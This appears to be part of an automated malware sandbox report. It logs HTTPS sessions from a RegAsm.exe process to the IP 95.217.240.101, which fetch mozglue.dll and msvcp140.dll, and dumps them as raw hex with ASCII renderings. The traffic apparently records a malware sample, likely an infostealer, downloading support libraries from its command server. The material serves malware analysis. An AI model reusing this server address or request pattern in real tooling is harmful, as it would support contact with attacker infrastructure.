                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                              Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                              Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                              Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                              Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                              Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                              Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                              Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                              Data Ascii: 0<48%8A)$(


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.54972195.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:21 UTC220OUTGET /mozglue.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:22 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:22 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 608080
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-94750"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:22 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                              Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                              Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                              Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                              Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                              Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                              Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                              Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                              Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                              2024-05-17 16:06:22 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                              Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.54972295.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:26 UTC221OUTGET /msvcp140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:27 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:27 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 450024
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-6dde8"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:27 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                              2024-05-17 16:06:27 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                              Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
